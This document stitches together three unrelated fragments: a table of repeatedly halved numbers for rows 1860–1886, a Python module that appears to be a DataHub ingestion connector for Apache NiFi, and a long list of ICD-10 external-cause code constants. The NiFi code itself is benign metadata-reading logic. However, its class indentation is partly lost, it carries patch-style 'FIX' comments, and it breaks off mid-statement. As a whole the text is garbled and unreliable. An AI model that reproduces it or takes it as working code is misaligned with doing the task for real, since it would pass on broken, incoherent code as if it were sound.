1860 1.47372391112021673867165451055906E-1120 7.3686195556010836933582725527953E-1121
1861 3.68430977780054184667913627639765E-1121 1.842154888900270923339568138198825E-1121
1862 9.210774444501354616697840690994125E-1122 4.605387222250677308348920345497063E-1122
1863 2.302693611125338654174460172748532E-1122 1.151346805562669327087230086374266E-1122
1864 5.75673402781334663543615043187133E-1123 2.878367013906673317718075215935665E-1123
1865 1.439183506953336658859037607967833E-1123 7.195917534766683294295188039839163E-1124
1866 3.597958767383341647147594019919582E-1124 1.798979383691670823573797009959791E-1124
1867 8.994896918458354117868985049798955E-1125 4.497448459229177058934492524899478E-1125
1868 2.248724229614588529467246262449739E-1125 1.124362114807294264733623131224870E-1125
1869 5.62181057403647132366811565612435E-1126 2.810905287018235661834057828062175E-1126
1870 1.405452643509117830917028914031088E-1126 7.027263217545589154585144570155438E-1127
1871 3.513631608772794577292572285077719E-1127 1.756815804386397288646286142538860E-1127
1872 8.78407902193198644323143071269430E-1128 4.39203951096599322161571535634715E-1128
1873 2.196019755482996610807857678173575E-1128 1.098009877741498305403928839086788E-1128
1874 5.49004938870749152701964419543394E-1129 2.74502469435374576350982209771697E-1129
1875 1.372512347176872881754911048858485E-1129 6.862561735884364408774555244292425E-1130
1876 3.431280867942182204387277622146213E-1130 1.715640433971091102193638811073106E-1130
1877 8.57820216985545551096819405536553E-1131 4.289101084927727755484097027682765E-1131
1878 2.144550542463863877742048513841383E-1131 1.072275271231931938871024256920691E-1131
1879 5.361376356159659694355121284603455E-1132 2.680688178079829847177560642301728E-1132
1880 1.340344089039914923588780321150864E-1132 6.70172044519957461794390160575432E-1133
1881 3.35086022259978730897195080287716E-1133 1.67543011129989365448597540143858E-1133
1882 8.3771505564994682724298770071929E-1134 4.18857527824973413621493850359645E-1134
1883 2.094287639124867068107469251798225E-1134 1.047143819562433534053734625899113E-1134
1884 5.235719097812167670268673129495565E-1135 2.617859548906083835134336564747783E-1135
1885 1.308929774453041917567168282373892E-1135 6.544648872265209587835841411869458E-1136
1886 3.272324436132604793917920705934729E-1136 1.636162218066302396958960352967365E-1136
| |
<gh_stars>1-10
import json
import logging
import ssl
import time
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from enum import Enum
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import urljoin
import requests
from dateutil import parser
from packaging import version
from requests.adapters import HTTPAdapter
import datahub.emitter.mce_builder as builder
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.schema_classes import (
ChangeTypeClass,
DataFlowInfoClass,
DataJobInfoClass,
DataJobInputOutputClass,
DataPlatformInstanceClass,
DatasetPropertiesClass,
)
# Module-level logger, named after this module per stdlib convention.
logger = logging.getLogger(__name__)
# Platform identifier used for this source (e.g. in urns / platform instances).
NIFI = "nifi"
# Python requests does not support passing password for key file,
# The same can be achieved by mounting ssl context
# as described here - https://github.com/psf/requests/issues/2519
# and here - https://github.com/psf/requests/issues/1573
class SSLAdapter(HTTPAdapter):
    """Transport adapter that mounts a pre-built ``ssl.SSLContext`` holding a
    client certificate and (optionally password-protected) private key.

    ``requests`` cannot accept a key-file password directly, so the context
    is created up front and injected into every connection pool.
    """

    def __init__(self, certfile, keyfile, password=None):
        # NOTE(review): Purpose.CLIENT_AUTH builds a server-side context;
        # a client verifying a server would normally use Purpose.SERVER_AUTH.
        # Kept as-is to preserve existing behavior -- confirm intent.
        ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ctx.load_cert_chain(certfile=certfile, keyfile=keyfile, password=password)
        # Must be assigned before HTTPAdapter.__init__, which calls
        # init_poolmanager (below) and therefore reads self.context.
        self.context = ctx
        super().__init__()

    def init_poolmanager(self, *args, **kwargs):
        """Hand our SSL context to every urllib3 pool this adapter creates."""
        kwargs["ssl_context"] = self.context
        return super().init_poolmanager(*args, **kwargs)
class NifiAuthType(Enum):
    """Authentication mechanisms supported when connecting to the nifi API."""
    NO_AUTH = "NO_AUTH"
    SINGLE_USER = "SINGLE_USER"
    CLIENT_CERT = "CLIENT_CERT"
class NifiSourceConfig(ConfigModel):
    """Configuration for the nifi ingestion source.

    Which of the optional credential fields must be set depends on ``auth``;
    see the per-field comments below.
    """

    # Base URL of the nifi instance, e.g. https://host:8443/ .
    site_url: str
    auth: NifiAuthType = NifiAuthType.NO_AUTH
    provenance_days: int = 7  # Fetch provenance events for past 1 week
    # Filter which process groups are ingested.
    process_group_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    # Required for nifi deployments using Remote Process Groups
    site_name: str = "default"
    # Maps a remote site's URL to a human-readable site name.
    site_url_to_site_name: Dict[str, str] = {}
    # Required to be set if auth is of type SINGLE_USER
    username: Optional[str]
    password: Optional[str]
    # Required to be set if auth is of type CLIENT_CERT
    client_cert_file: Optional[str]
    client_key_file: Optional[str]
    client_key_password: Optional[str]
    # Required to be set if nifi server certificate is not signed by
    # root CA trusted by client system, e.g. self-signed certificates
    ca_file: Optional[str]
    # DataHub environment (e.g. PROD) used when constructing urns.
    env: str = builder.DEFAULT_ENV
# nifi REST API endpoint paths, presumably resolved against the configured
# site_url (urljoin is imported above) -- confirm at call sites.
TOKEN_ENDPOINT = "/nifi-api/access/token"
ABOUT_ENDPOINT = "/nifi-api/flow/about"
CLUSTER_ENDPOINT = "/nifi-api/flow/cluster/summary"
PG_ENDPOINT = "/nifi-api/flow/process-groups/"
PROVENANCE_ENDPOINT = "/nifi-api/provenance/"
class NifiType(Enum):
    """Kinds of components that can appear on a nifi flow canvas."""
    PROCESSOR = "PROCESSOR"
    FUNNEL = "FUNNEL"
    INPUT_PORT = "INPUT_PORT"
    OUTPUT_PORT = "OUTPUT_PORT"
    REMOTE_INPUT_PORT = "REMOTE_INPUT_PORT"
    REMOTE_OUTPUT_PORT = "REMOTE_OUTPUT_PORT"
class NifiEventType:
    """Provenance event type names used by the nifi provenance API."""
    CREATE = "CREATE"
    FETCH = "FETCH"
    SEND = "SEND"
    RECEIVE = "RECEIVE"
class NifiProcessorType:
    """Fully-qualified class names of the nifi processors this source
    understands for external (S3 / SFTP) lineage extraction."""
    ListS3 = "org.apache.nifi.processors.aws.s3.ListS3"
    FetchS3Object = "org.apache.nifi.processors.aws.s3.FetchS3Object"
    PutS3Object = "org.apache.nifi.processors.aws.s3.PutS3Object"
    ListSFTP = "org.apache.nifi.processors.standard.ListSFTP"
    FetchSFTP = "org.apache.nifi.processors.standard.FetchSFTP"
    GetSFTP = "org.apache.nifi.processors.standard.GetSFTP"
    PutSFTP = "org.apache.nifi.processors.standard.PutSFTP"
# To support new processor type,
# 1. add an entry in KNOWN_INGRESS_EGRESS_PROCESORS
# 2. Implement provenance event analyzer to find external dataset and
# map it in provenance_event_to_lineage_map
class NifiProcessorProvenanceEventAnalyzer:
    """Maps provenance events of known ingress/egress processors to the
    external datasets they read or write.

    `env` must be assigned by the caller before any analyzer method is
    invoked; it is used when constructing dataset URNs.
    """

    env: str

    # Processor class name -> the provenance event type that carries the
    # lineage-relevant attributes for that processor.
    KNOWN_INGRESS_EGRESS_PROCESORS = {
        NifiProcessorType.ListS3: NifiEventType.CREATE,
        NifiProcessorType.FetchS3Object: NifiEventType.FETCH,
        NifiProcessorType.PutS3Object: NifiEventType.SEND,
        NifiProcessorType.ListSFTP: NifiEventType.CREATE,
        NifiProcessorType.FetchSFTP: NifiEventType.FETCH,
        NifiProcessorType.GetSFTP: NifiEventType.RECEIVE,
        NifiProcessorType.PutSFTP: NifiEventType.SEND,
    }

    def __init__(self) -> None:
        # Map of Nifi processor type to the provenance event analyzer to find lineage
        self.provenance_event_to_lineage_map: Dict[
            str, Callable[[Dict], ExternalDataset]
        ] = {
            NifiProcessorType.ListS3: self.process_s3_provenance_event,
            NifiProcessorType.FetchS3Object: self.process_s3_provenance_event,
            NifiProcessorType.PutS3Object: self.process_s3_provenance_event,
            NifiProcessorType.ListSFTP: self.process_sftp_provenance_event,
            NifiProcessorType.FetchSFTP: self.process_sftp_provenance_event,
            NifiProcessorType.GetSFTP: self.process_sftp_provenance_event,
            NifiProcessorType.PutSFTP: self.process_sftp_provenance_event,
        }

    def process_s3_provenance_event(self, event):
        """Build an ExternalDataset for an S3-backed provenance event.

        The dataset is the containing S3 "folder", not the individual object.
        """
        attributes = event.get("attributes", [])
        s3_bucket = get_attribute_value(attributes, "s3.bucket")
        s3_key = get_attribute_value(attributes, "s3.key")
        if not s3_key:
            s3_key = get_attribute_value(attributes, "filename")

        s3_url = f"s3://{s3_bucket}/{s3_key}"
        # Strip the final path segment (object name) to get the folder.
        s3_url = s3_url[: s3_url.rindex("/")]
        dataset_name = s3_url.replace("s3://", "").replace("/", ".")
        # NOTE(review): this is already a full platform URN; confirm
        # make_dataset_urn does not prefix it again.
        platform = "urn:li:dataPlatform:s3"
        dataset_urn = builder.make_dataset_urn(platform, dataset_name, self.env)
        return ExternalDataset(
            platform,
            dataset_name,
            dict(s3_uri=s3_url),
            dataset_urn,
        )

    def process_sftp_provenance_event(self, event):
        """Build an ExternalDataset for an SFTP-backed provenance event.

        Falls back to the event's transitUri when host/path/filename
        attributes are missing. The dataset is the containing directory,
        not the individual file.
        """
        attributes = event.get("attributes", [])
        remote_host = get_attribute_value(attributes, "sftp.remote.host")
        path = get_attribute_value(attributes, "path")
        filename = get_attribute_value(attributes, "filename")
        # FIX: interpolate the actual filename; the source contained a
        # scrubbed "(unknown)" placeholder here.
        absolute_path = f"sftp://{remote_host}/{path}/{filename}"
        if remote_host is None or path is None or filename is None:
            absolute_path = event.get("transitUri")

        # Normalize "/./" segments and a trailing "/.".
        absolute_path = absolute_path.replace("/./", "/")
        if absolute_path.endswith("/."):
            absolute_path = absolute_path[:-2]
        # Strip the final path segment (file name) to get the directory.
        absolute_path = absolute_path[: absolute_path.rindex("/")]

        dataset_name = absolute_path.replace("sftp://", "").replace("/", ".")
        platform = "file"
        dataset_urn = builder.make_dataset_urn(platform, dataset_name, self.env)
        return ExternalDataset(
            platform,
            dataset_name,
            dict(uri=absolute_path),
            dataset_urn,
        )
@dataclass
class ExternalDataset:
    """An external (non-NiFi) dataset referenced by a provenance event."""

    platform: str
    dataset_name: str
    dataset_properties: Dict[str, str]
    dataset_urn: str
@dataclass
class NifiComponent:
    """A node in the NiFi flow graph (processor, funnel, port, remote port)."""

    id: str
    name: str
    type: str
    parent_group_id: str
    nifi_type: NifiType
    comments: Optional[str] = None
    status: Optional[str] = None

    # present only for nifi remote ports and processors
    inlets: Dict[str, ExternalDataset] = field(default_factory=dict)
    outlets: Dict[str, ExternalDataset] = field(default_factory=dict)

    # present only for processors
    config: Optional[Dict] = None

    # present only for nifi remote ports
    target_uris: Optional[str] = None
    parent_rpg_id: Optional[str] = None

    # Last successful event time
    last_event_time: Optional[str] = None
@dataclass
class NifiProcessGroup:
    """A (possibly nested) NiFi process group."""

    id: str
    name: str
    parent_group_id: Optional[str]  # None for the root process group
@dataclass
class NifiRemoteProcessGroup:
    """A NiFi Remote Process Group and its connected remote ports."""

    id: str
    name: str
    parent_group_id: str
    # Remote port id -> component, for ports that are actually connected.
    remote_ports: Dict[str, NifiComponent]
@dataclass
class NifiFlow:
    """In-memory model of the entire NiFi flow, built by NifiSource."""

    version: Optional[str]
    clustered: Optional[bool]
    root_process_group: NifiProcessGroup
    # Component id -> component, for all tracked components.
    components: Dict[str, NifiComponent] = field(default_factory=dict)
    remotely_accessible_ports: Dict[str, NifiComponent] = field(default_factory=dict)
    # Directed edges as (source component id, destination component id).
    connections: List[Tuple[str, str]] = field(default_factory=list)
    processGroups: Dict[str, NifiProcessGroup] = field(default_factory=dict)
    remoteProcessGroups: Dict[str, NifiRemoteProcessGroup] = field(default_factory=dict)
    remote_ports: Dict[str, NifiComponent] = field(default_factory=dict)
def get_attribute_value(attr_lst: List[dict], attr_name: str) -> Optional[str]:
    """Return the value of the first attribute named `attr_name`, or None."""
    return next(
        (entry["value"] for entry in attr_lst if entry["name"] == attr_name),
        None,
    )
@dataclass
class NifiSourceReport(SourceReport):
    """Ingestion report that additionally tracks filtered-out entities."""

    filtered: List[str] = field(default_factory=list)

    def report_dropped(self, ent_name: str) -> None:
        # Record an entity skipped due to process_group_pattern filtering.
        self.filtered.append(ent_name)
# NOTE: ports with allowRemoteAccess set are treated as remotely accessible
# ports in update_flow below.
class NifiSource(Source):
config: NifiSourceConfig
report: NifiSourceReport
def __init__(self, config: NifiSourceConfig, ctx: PipelineContext) -> None:
    """Set up the HTTP session and authenticate against NiFi as configured.

    Supports NO_AUTH, SINGLE_USER (username/password token) and CLIENT_CERT
    (mutual TLS) authentication modes.
    """
    super().__init__(ctx)
    self.config = config
    self.report = NifiSourceReport()
    self.session = requests.Session()

    # Trust a custom CA bundle (e.g. for self-signed server certs).
    if self.config.ca_file is not None:
        self.session.verify = self.config.ca_file

    # Ensure this instance's own site is always present in the mapping
    # used to resolve Remote Process Group targets.
    if self.config.site_url_to_site_name is None:
        self.config.site_url_to_site_name = {}
    if (
        not urljoin(self.config.site_url, "/nifi/")
        in self.config.site_url_to_site_name
    ):
        self.config.site_url_to_site_name[
            urljoin(self.config.site_url, "/nifi/")
        ] = self.config.site_name

    if self.config.auth is NifiAuthType.CLIENT_CERT:
        logger.debug("Setting client certificates in requests ssl context")
        assert (
            self.config.client_cert_file is not None
        ), "Config client_cert_file is required for CLIENT_CERT auth"
        self.session.mount(
            urljoin(self.config.site_url, "/nifi-api/"),
            SSLAdapter(
                certfile=self.config.client_cert_file,
                keyfile=self.config.client_key_file,
                password=self.config.client_key_password,
            ),
        )

    if self.config.auth is NifiAuthType.SINGLE_USER:
        assert (
            self.config.username is not None
        ), "Config username is required for SINGLE_USER auth"
        assert (
            self.config.password is not None
        ), "Config password is required for SINGLE_USER auth"
        token_response = self.session.post(
            url=urljoin(self.config.site_url, TOKEN_ENDPOINT),
            data={
                "username": self.config.username,
                # FIX: send the configured password; the source contained a
                # scrubbed "<PASSWORD>" placeholder (a syntax error).
                "password": self.config.password,
            },
        )
        if not token_response.ok:
            # Best-effort: record the failure but continue; subsequent
            # requests will fail and be reported individually.
            logger.error("Failed to get token")
            self.report.report_failure(self.config.site_url, "Failed to get token")
        self.session.headers.update(
            {
                "Authorization": "Bearer " + token_response.text,
                "Content-Type": "application/json",
            }
        )
    else:
        self.session.headers.update(
            {
                "Content-Type": "application/json",
            }
        )
@classmethod
def create(cls, config_dict: dict, ctx: PipelineContext) -> "Source":
    """Factory used by the ingestion framework to build a NifiSource."""
    return cls(NifiSourceConfig.parse_obj(config_dict), ctx)
def get_report(self) -> SourceReport:
    """Return the report accumulated during ingestion."""
    return self.report
def update_flow(self, pg_flow_dto: Dict) -> None:  # noqa: C901
    """Recursively index a NiFi process-group flow DTO into self.nifi_flow.

    Registers processors, funnels, input/output ports, remote process
    groups and connections, then fetches and recurses into each child
    process group via the REST API. Groups rejected by
    `process_group_pattern` are reported as dropped and their whole
    subtree is skipped.
    """
    breadcrumb_dto = pg_flow_dto.get("breadcrumb", {}).get("breadcrumb", {})
    nifi_pg = NifiProcessGroup(
        breadcrumb_dto.get("id"),
        breadcrumb_dto.get("name"),
        pg_flow_dto.get("parentGroupId"),
    )
    self.nifi_flow.processGroups[nifi_pg.id] = nifi_pg
    if not self.config.process_group_pattern.allowed(nifi_pg.name):
        self.report.report_dropped(f"{nifi_pg.name}.*")
        return

    flow_dto = pg_flow_dto.get("flow", {})

    for processor in flow_dto.get("processors", []):
        component = processor.get("component")
        self.nifi_flow.components[component.get("id")] = NifiComponent(
            component.get("id"),
            component.get("name"),
            component.get("type"),
            component.get("parentGroupId"),
            NifiType.PROCESSOR,
            config=component.get("config"),
            comments=component.get("config", {}).get("comments"),
            status=component.get("status", {}).get("runStatus"),
        )

    for funnel in flow_dto.get("funnels", []):
        component = funnel.get("component")
        self.nifi_flow.components[component.get("id")] = NifiComponent(
            component.get("id"),
            component.get("name"),
            component.get("type"),
            component.get("parentGroupId"),
            NifiType.FUNNEL,
            comments=component.get("comments"),
            status=component.get("status", {}).get("runStatus"),
        )
        logger.debug(f"Adding funnel {component.get('id')}")

    for connection in flow_dto.get("connections", []):
        # Exclude self - recursive relationships
        if connection.get("sourceId") != connection.get("destinationId"):
            self.nifi_flow.connections.append(
                (connection.get("sourceId"), connection.get("destinationId"))
            )

    for inputPort in flow_dto.get("inputPorts", []):
        component = inputPort.get("component")
        if inputPort.get("allowRemoteAccess"):
            self.nifi_flow.remotely_accessible_ports[
                component.get("id")
            ] = NifiComponent(
                component.get("id"),
                component.get("name"),
                component.get("type"),
                component.get("parentGroupId"),
                NifiType.INPUT_PORT,
                comments=component.get("comments"),
                status=component.get("status", {}).get("runStatus"),
            )
            logger.debug(f"Adding remotely accessible port {component.get('id')}")
        else:
            self.nifi_flow.components[component.get("id")] = NifiComponent(
                component.get("id"),
                component.get("name"),
                component.get("type"),
                component.get("parentGroupId"),
                NifiType.INPUT_PORT,
                comments=component.get("comments"),
                status=component.get("status", {}).get("runStatus"),
            )
            logger.debug(f"Adding port {component.get('id')}")

    for outputPort in flow_dto.get("outputPorts", []):
        component = outputPort.get("component")
        if outputPort.get("allowRemoteAccess"):
            self.nifi_flow.remotely_accessible_ports[
                component.get("id")
            ] = NifiComponent(
                component.get("id"),
                component.get("name"),
                component.get("type"),
                component.get("parentGroupId"),
                NifiType.OUTPUT_PORT,
                comments=component.get("comments"),
                status=component.get("status", {}).get("runStatus"),
            )
            logger.debug(f"Adding remotely accessible port {component.get('id')}")
        else:
            self.nifi_flow.components[component.get("id")] = NifiComponent(
                component.get("id"),
                component.get("name"),
                component.get("type"),
                component.get("parentGroupId"),
                NifiType.OUTPUT_PORT,
                comments=component.get("comments"),
                status=component.get("status", {}).get("runStatus"),
            )
            logger.debug(f"Adding report port {component.get('id')}")

    for rpg in flow_dto.get("remoteProcessGroups", []):
        rpg_component = rpg.get("component", {})
        remote_ports = {}

        contents = rpg_component.get("contents", {})
        for component in contents.get("outputPorts", []):
            if component.get("connected", False):
                remote_ports[component.get("id")] = NifiComponent(
                    component.get("id"),
                    component.get("name"),
                    component.get("type"),
                    rpg_component.get("parentGroupId"),
                    NifiType.REMOTE_OUTPUT_PORT,
                    target_uris=rpg_component.get("targetUris"),
                    parent_rpg_id=rpg_component.get("id"),
                    comments=component.get("comments"),
                    status=component.get("status", {}).get("runStatus"),
                )
                logger.debug(f"Adding remote output port {component.get('id')}")

        for component in contents.get("inputPorts", []):
            if component.get("connected", False):
                remote_ports[component.get("id")] = NifiComponent(
                    component.get("id"),
                    component.get("name"),
                    component.get("type"),
                    rpg_component.get("parentGroupId"),
                    NifiType.REMOTE_INPUT_PORT,
                    target_uris=rpg_component.get("targetUris"),
                    parent_rpg_id=rpg_component.get("id"),
                    comments=component.get("comments"),
                    status=component.get("status", {}).get("runStatus"),
                )
                logger.debug(f"Adding remote input port {component.get('id')}")

        nifi_rpg = NifiRemoteProcessGroup(
            rpg_component.get("id"),
            rpg_component.get("name"),
            # FIX: use the RPG's own parent group id. Previously this read
            # `component`, a leftover variable from the port loops above
            # (wrong value, and a NameError when the RPG has no ports).
            rpg_component.get("parentGroupId"),
            remote_ports,
        )
        logger.debug(f"Adding remote process group {rpg_component.get('id')}")
        self.nifi_flow.components.update(remote_ports)
        self.nifi_flow.remoteProcessGroups[nifi_rpg.id] = nifi_rpg

    for pg in flow_dto.get("processGroups", []):
        pg_response = self.session.get(
            url=urljoin(self.config.site_url, PG_ENDPOINT) + pg.get("id")
        )

        if not pg_response.ok:
            self.report_warning(
                self.config.site_url,
                "Failed to get process group flow " + pg.get("id"),
            )
            continue

        pg_flow_dto = pg_response.json().get("processGroupFlow", {})
        self.update_flow(pg_flow_dto)
def update_flow_keep_only_ingress_egress(self):
components_to_del: List[NifiComponent] = []
for component in self.nifi_flow.components.values():
if (
component.nifi_type is NifiType.PROCESSOR
and component.type
not in NifiProcessorProvenanceEventAnalyzer.KNOWN_INGRESS_EGRESS_PROCESORS.keys()
) or component.nifi_type not in [
NifiType.PROCESSOR,
NifiType.REMOTE_INPUT_PORT,
NifiType.REMOTE_OUTPUT_PORT,
]:
components_to_del.append(component)
incoming = list(
filter(lambda x: x[1] == component.id, self.nifi_flow.connections)
)
outgoing = list(
filter(lambda x: x[0] == component.id, self.nifi_flow.connections)
)
# Create new connections from incoming to outgoing
for i in incoming:
for j in outgoing:
self.nifi_flow.connections.append((i[0], j[1]))
# Remove older connections, as we already created
# new connections bypassing component to be deleted
for i in incoming:
self.nifi_flow.connections.remove(i)
for j in outgoing:
self.nifi_flow.connections.remove(j)
for c in components_to_del:
if c.nifi_type is NifiType.PROCESSOR and (
| |
"V77"
V77_0 = "V77.0"
V77_1 = "V77.1"
V77_2 = "V77.2"
V77_3 = "V77.3"
V77_4 = "V77.4"
V77_5 = "V77.5"
V77_6 = "V77.6"
V77_7 = "V77.7"
V77_9 = "V77.9"
V78 = "V78"
V78_0 = "V78.0"
V78_1 = "V78.1"
V78_2 = "V78.2"
V78_3 = "V78.3"
V78_4 = "V78.4"
V78_5 = "V78.5"
V78_6 = "V78.6"
V78_7 = "V78.7"
V78_9 = "V78.9"
V79 = "V79"
V79_0 = "V79.0"
V79_1 = "V79.1"
V79_2 = "V79.2"
V79_3 = "V79.3"
V79_4 = "V79.4"
V79_5 = "V79.5"
V79_6 = "V79.6"
V79_8 = "V79.8"
V79_9 = "V79.9"
V80_V89 = "V80-V89"
V80 = "V80"
V80_0 = "V80.0"
V80_1 = "V80.1"
V80_2 = "V80.2"
V80_3 = "V80.3"
V80_4 = "V80.4"
V80_5 = "V80.5"
V80_6 = "V80.6"
V80_7 = "V80.7"
V80_8 = "V80.8"
V80_9 = "V80.9"
V81 = "V81"
V81_0 = "V81.0"
V81_1 = "V81.1"
V81_2 = "V81.2"
V81_3 = "V81.3"
V81_4 = "V81.4"
V81_5 = "V81.5"
V81_6 = "V81.6"
V81_7 = "V81.7"
V81_8 = "V81.8"
V81_9 = "V81.9"
V82 = "V82"
V82_0 = "V82.0"
V82_1 = "V82.1"
V82_2 = "V82.2"
V82_3 = "V82.3"
V82_4 = "V82.4"
V82_5 = "V82.5"
V82_6 = "V82.6"
V82_7 = "V82.7"
V82_8 = "V82.8"
V82_9 = "V82.9"
V83 = "V83"
V83_0 = "V83.0"
V83_1 = "V83.1"
V83_2 = "V83.2"
V83_3 = "V83.3"
V83_4 = "V83.4"
V83_5 = "V83.5"
V83_6 = "V83.6"
V83_7 = "V83.7"
V83_9 = "V83.9"
V84 = "V84"
V84_0 = "V84.0"
V84_1 = "V84.1"
V84_2 = "V84.2"
V84_3 = "V84.3"
V84_4 = "V84.4"
V84_5 = "V84.5"
V84_6 = "V84.6"
V84_7 = "V84.7"
V84_9 = "V84.9"
V85 = "V85"
V85_0 = "V85.0"
V85_1 = "V85.1"
V85_2 = "V85.2"
V85_3 = "V85.3"
V85_4 = "V85.4"
V85_5 = "V85.5"
V85_6 = "V85.6"
V85_7 = "V85.7"
V85_9 = "V85.9"
V86 = "V86"
V86_0 = "V86.0"
V86_1 = "V86.1"
V86_2 = "V86.2"
V86_3 = "V86.3"
V86_4 = "V86.4"
V86_5 = "V86.5"
V86_6 = "V86.6"
V86_7 = "V86.7"
V86_9 = "V86.9"
V87 = "V87"
V87_0 = "V87.0"
V87_1 = "V87.1"
V87_2 = "V87.2"
V87_3 = "V87.3"
V87_4 = "V87.4"
V87_5 = "V87.5"
V87_6 = "V87.6"
V87_7 = "V87.7"
V87_8 = "V87.8"
V87_9 = "V87.9"
V88 = "V88"
V88_0 = "V88.0"
V88_1 = "V88.1"
V88_2 = "V88.2"
V88_3 = "V88.3"
V88_4 = "V88.4"
V88_5 = "V88.5"
V88_6 = "V88.6"
V88_7 = "V88.7"
V88_8 = "V88.8"
V88_9 = "V88.9"
V89 = "V89"
V89_0 = "V89.0"
V89_1 = "V89.1"
V89_2 = "V89.2"
V89_3 = "V89.3"
V89_9 = "V89.9"
V90_V94 = "V90-V94"
V90 = "V90"
V90_0 = "V90.0"
V90_1 = "V90.1"
V90_2 = "V90.2"
V90_3 = "V90.3"
V90_4 = "V90.4"
V90_5 = "V90.5"
V90_6 = "V90.6"
V90_7 = "V90.7"
V90_8 = "V90.8"
V90_9 = "V90.9"
V91 = "V91"
V91_0 = "V91.0"
V91_1 = "V91.1"
V91_2 = "V91.2"
V91_3 = "V91.3"
V91_4 = "V91.4"
V91_5 = "V91.5"
V91_6 = "V91.6"
V91_7 = "V91.7"
V91_8 = "V91.8"
V91_9 = "V91.9"
V92 = "V92"
V92_0 = "V92.0"
V92_1 = "V92.1"
V92_2 = "V92.2"
V92_3 = "V92.3"
V92_4 = "V92.4"
V92_5 = "V92.5"
V92_6 = "V92.6"
V92_7 = "V92.7"
V92_8 = "V92.8"
V92_9 = "V92.9"
V93 = "V93"
V93_0 = "V93.0"
V93_1 = "V93.1"
V93_2 = "V93.2"
V93_3 = "V93.3"
V93_4 = "V93.4"
V93_5 = "V93.5"
V93_6 = "V93.6"
V93_7 = "V93.7"
V93_8 = "V93.8"
V93_9 = "V93.9"
V94 = "V94"
V94_0 = "V94.0"
V94_1 = "V94.1"
V94_2 = "V94.2"
V94_3 = "V94.3"
V94_4 = "V94.4"
V94_5 = "V94.5"
V94_6 = "V94.6"
V94_7 = "V94.7"
V94_8 = "V94.8"
V94_9 = "V94.9"
V95_V97 = "V95-V97"
V95 = "V95"
V95_0 = "V95.0"
V95_1 = "V95.1"
V95_2 = "V95.2"
V95_3 = "V95.3"
V95_4 = "V95.4"
V95_8 = "V95.8"
V95_9 = "V95.9"
V96 = "V96"
V96_0 = "V96.0"
V96_1 = "V96.1"
V96_2 = "V96.2"
V96_8 = "V96.8"
V96_9 = "V96.9"
V97 = "V97"
V97_0 = "V97.0"
V97_1 = "V97.1"
V97_2 = "V97.2"
V97_3 = "V97.3"
V97_8 = "V97.8"
V98_V99 = "V98-V99"
V98 = "V98"
V99 = "V99"
W00_X59 = "W00-X59"
W00_W19 = "W00-W19"
W00 = "W00"
W01 = "W01"
W02 = "W02"
W03 = "W03"
W04 = "W04"
W05 = "W05"
W06 = "W06"
W07 = "W07"
W08 = "W08"
W09 = "W09"
W10 = "W10"
W11 = "W11"
W12 = "W12"
W13 = "W13"
W14 = "W14"
W15 = "W15"
W16 = "W16"
W17 = "W17"
W18 = "W18"
W19 = "W19"
W20_W49 = "W20-W49"
W20 = "W20"
W21 = "W21"
W22 = "W22"
W23 = "W23"
W24 = "W24"
W25 = "W25"
W26 = "W26"
W27 = "W27"
W28 = "W28"
W29 = "W29"
W30 = "W30"
W31 = "W31"
W32 = "W32"
W33 = "W33"
W34 = "W34"
W35 = "W35"
W36 = "W36"
W37 = "W37"
W38 = "W38"
W39 = "W39"
W40 = "W40"
W41 = "W41"
W42 = "W42"
W43 = "W43"
W44 = "W44"
W45 = "W45"
W46 = "W46"
W49 = "W49"
W50_W64 = "W50-W64"
W50 = "W50"
W51 = "W51"
W52 = "W52"
W53 = "W53"
W54 = "W54"
W55 = "W55"
W56 = "W56"
W57 = "W57"
W58 = "W58"
W59 = "W59"
W60 = "W60"
W64 = "W64"
W65_W74 = "W65-W74"
W65 = "W65"
W66 = "W66"
W67 = "W67"
W68 = "W68"
W69 = "W69"
W70 = "W70"
W73 = "W73"
W74 = "W74"
W75_W84 = "W75-W84"
W75 = "W75"
W76 = "W76"
W77 = "W77"
W78 = "W78"
W79 = "W79"
W80 = "W80"
W81 = "W81"
W83 = "W83"
W84 = "W84"
W85_W99 = "W85-W99"
W85 = "W85"
W86 = "W86"
W87 = "W87"
W88 = "W88"
W89 = "W89"
W90 = "W90"
W91 = "W91"
W92 = "W92"
W93 = "W93"
W94 = "W94"
W99 = "W99"
X00_X09 = "X00-X09"
X00 = "X00"
X01 = "X01"
X02 = "X02"
X03 = "X03"
X04 = "X04"
X05 = "X05"
X06 = "X06"
X08 = "X08"
X09 = "X09"
X10_X19 = "X10-X19"
X10 = "X10"
X11 = "X11"
X12 = "X12"
X13 = "X13"
X14 = "X14"
X15 = "X15"
X16 = "X16"
X17 = "X17"
X18 = "X18"
X19 = "X19"
X20_X29 = "X20-X29"
X20 = "X20"
X21 = "X21"
X22 = "X22"
X23 = "X23"
X24 = "X24"
X25 = "X25"
X26 = "X26"
X27 = "X27"
X28 = "X28"
X29 = "X29"
X30_X39 = "X30-X39"
X30 = "X30"
X31 = "X31"
X32 = "X32"
X33 = "X33"
X34 = "X34"
X34_0 = "X34.0"
X34_1 = "X34.1"
X34_8 = "X34.8"
X34_9 = "X34.9"
X35 = "X35"
X36 = "X36"
X37 = "X37"
X38 = "X38"
X39 = "X39"
X40_X49 = "X40-X49"
X40 = "X40"
X41 = "X41"
X42 = "X42"
X43 = "X43"
X44 = "X44"
X45 = "X45"
X46 = "X46"
X47 = "X47"
X48 = "X48"
X49 = "X49"
X50_X57 = "X50-X57"
X50 = "X50"
X51 = "X51"
X52 = "X52"
X53 = "X53"
X54 = "X54"
X57 = "X57"
X58_X59 = "X58-X59"
X58 = "X58"
X59 = "X59"
X59_0 = "X59.0"
X59_9 = "X59.9"
X60_X84 = "X60-X84"
X60 = "X60"
X61 = "X61"
X62 = "X62"
X63 = "X63"
X64 = "X64"
X65 = "X65"
X66 = "X66"
X67 = "X67"
X68 = "X68"
X69 = "X69"
X70 = "X70"
X71 = "X71"
X72 = "X72"
X73 = "X73"
X74 = "X74"
X75 = "X75"
X76 = "X76"
X77 = "X77"
X78 = "X78"
X79 = "X79"
X80 = "X80"
X81 = "X81"
X82 = "X82"
X83 = "X83"
X84 = "X84"
